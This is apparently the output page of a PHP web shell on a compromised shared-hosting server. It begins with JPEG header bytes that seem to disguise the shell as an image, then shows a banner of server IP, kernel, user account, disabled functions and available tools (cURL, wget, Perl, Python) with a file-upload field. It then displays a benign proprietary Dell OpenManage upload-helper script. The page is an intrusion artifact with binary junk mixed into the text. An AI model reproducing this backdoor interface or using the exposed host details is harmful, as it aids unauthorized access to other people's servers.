����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.82 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/dell/srvadmin/lib64/openmanage/apache-tomcat/webapps/omsa/oma/js/ |
Upload File : |
//------------------------------------------------------------------------- // // DELL INC. PROPRIETARY INFORMATION // // This software is supplied under the terms of a license agreement or // nondisclosure agreement with Dell Computer Corporation and may not // be copied or disclosed except in accordance with the terms of that // agreement. // // Copyright (c) 1995-2001 Dell Inc. All Rights Reserved. // // Abstract/Purpose: // // // Environment: // Windows NT/2000, Linux, Netware // // Created/Version: // 2001 Jul 24 / $Revision: $ // // Author: // Christopher Poblete // // Last Modified By/On: // $Author: $ / $Date: $ // //------------------------------------------------------------------------- // NOTE: This code is used to prevent the upload servlet from hanging // while uploading a file. This happens in Netscape 6.1 and some // versions of IE while accessing a Netware server. // This code requires an iframe with name and id of uploadtest in the // page containing this code. var g_sUploadFile = null; var g_sUploadDirectory = null; function uploadStart (sFile, sUploadDirectory) { g_sUploadFile = sFile; g_sUploadDirectory = sUploadDirectory; window.setTimeout (uploadCallback, 10000); } function uploadCompleted () { var sfile = ""; if (g_sUploadDirectory != null) sfile = g_sUploadDirectory + '/'; sfile += getUploadFile (); document.location.href = top.gnv.appendVID(document.dataarea.redirectURL.value + '&ufile=' + sfile); } function uploadCallback () { uploadtest.document.location.href = top.gnv.appendVID('./UploadServlet?loadcheck=' + getUploadFile ()); window.setTimeout (uploadCallback, 30000); } function getUploadFile () { var sfile = g_sUploadFile; var index = sfile.lastIndexOf ('/'); if (index == -1) index = sfile.lastIndexOf ('\\'); sfile = sfile.substr (index + 1); return sfile; }